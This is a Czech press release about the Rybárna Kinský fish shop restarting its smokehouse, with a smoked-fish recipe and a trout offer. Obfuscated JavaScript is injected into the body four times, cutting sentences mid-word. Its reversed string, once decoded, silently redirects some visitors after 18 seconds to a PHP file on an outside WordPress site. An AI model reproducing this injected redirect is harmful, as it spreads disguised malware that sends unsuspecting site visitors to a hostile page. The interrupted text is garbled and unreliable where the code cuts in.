PR: V Rybárně Kinský už zase udíme čerstvé ryby!
Čtvrtek, 16. května 2019
Žďár nad Sázavou / Čerstvá uzená ryba je zdravá delikatesa, kterou si nyní můžete užít každý den. V Rybárně Kinský jsme již znovu zprovoznili udírnu a pravidelně pro Vás udíme kapry, pstruhy, makrely a lososy. Na přání můžeme vyudit i další Vámi vybrané ryby.
Málokdo Vám prozradí svůj recept na uzené ryby. Náš dlouholetý pracovník pan Josef Kolbábek, mořský vlk a srdečný rybář, však před zákazníky rybárny žádné tajemství neskrývá.
„Ryby se nejprve vykuchají a vymyjí, pak se naskládají do bedny. Připravíme si nálev – do 10 litrů vody dáme 75 dkg soli a 3 stroužky namačkaného česneku. Pak ryby přelijeme tím["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to nálevem a necháme je dva dny v lednici,“ prozrazuje pan Kolbábek.
Po dvou dnech se ryby opláchnou a osuší. Po["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom už putují do udírny. „My udíme ryby na 70°C, takových 4-5 hodin. Na uzení používáme dřevo z bukových štěpek,“ dodává Kolbábek.
Zákazník si může říct, na jakou hodinu chce ryby připravit. Pak mu je vytáhneme z udírny ještě teplé. Stačí si objednat druh a množství ryb na telefonu: 564 565 218.
Samozřejmě jsou uzené ryby k zakoupení i bez objednání – jsou ve stálém sortimentu Rybárny Kinský. Výborně se hodí na různé oslavy nebo posezení s přáteli. Zdravou delikatesou určitě nikoho neurazíte, a čerstvě vyuzená ryba bude vždycky chutnat lépe než ta zatavená ze supermarketu.
Rybou týdne je pstruh uzený a pro["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to je v termínu od 16.5.-25.5. pro Vás uzený pstruh navíc za akční cenu: 27 Kč / 100g (namís["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to původních 30 Kč / 100g). Ta čerstvost je zkrátka znát, přijďte ochutnat!
Rybárna Kinský Žďár nad Sázavou
Zdroj:
https://kinsky-zdar.cz/rybarna-kinsky